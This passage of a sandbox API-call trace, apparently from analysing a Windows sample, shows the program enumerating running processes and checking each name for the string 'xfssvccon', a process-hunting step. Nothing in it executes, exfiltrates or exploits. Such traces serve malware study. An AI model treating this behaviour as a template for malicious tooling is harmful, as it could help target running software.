pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.803] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35688f8 [0093.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35688f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.803] StrStrIA (lpFirst="csrss.exe", lpSrch="xfssvccon") returned 0x0 [0093.803] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.804] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35689a0 [0093.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35689a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0093.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0093.804] StrStrIA (lpFirst="winlogon.exe", lpSrch="xfssvccon") returned 0x0 [0093.804] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.805] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568a00 [0093.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3568a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0093.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0093.805] StrStrIA (lpFirst="services.exe", lpSrch="xfssvccon") returned 0x0 [0093.805] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.806] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568760 [0093.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3568760, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0093.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0093.806] StrStrIA (lpFirst="lsass.exe", lpSrch="xfssvccon") returned 0x0 [0093.806] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.807] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568898 [0093.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.807] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.807] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.808] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35687a8 [0093.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35687a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.808] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="xfssvccon") returned 0x0 [0093.808] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.809] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568808 [0093.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.809] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.810] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="xfssvccon") returned 0x0 [0093.810] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.811] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568838 [0093.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.811] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.811] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.812] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547a38 [0093.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547a38, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0093.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0093.812] StrStrIA (lpFirst="dwm.exe", lpSrch="xfssvccon") returned 0x0 [0093.812] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.813] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568868 [0093.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.813] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.813] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.814] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568880 [0093.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.814] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.814] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.814] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.815] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35688e0 [0093.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35688e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.815] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.815] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.816] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568910 [0093.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.816] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.816] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.816] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.817] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568928 [0093.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.818] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.818] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.818] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568aa8 [0093.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.819] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.819] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.820] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568c70 [0093.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.820] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.820] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.821] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568c88 [0093.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568c88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.821] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.821] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.822] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568ac0 [0093.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.822] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.822] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.823] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568c10 [0093.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.823] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.823] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.824] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568ad8 [0093.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3568ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0093.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0093.824] StrStrIA (lpFirst="spoolsv.exe", lpSrch="xfssvccon") returned 0x0 [0093.824] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.825] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568b08 [0093.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.825] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0093.825] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.826] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568b38 [0093.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3568b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0093.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0093.826] StrStrIA (lpFirst="audiodg.exe", lpSrch="xfssvccon") returned 0x0 [0093.826] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0093.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.827] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568d00 [0093.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3568d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0093.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0093.827] StrStrIA (lpFirst="sihost.exe", lpSrch="xfssvccon") returned 0x0 [0093.827] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, 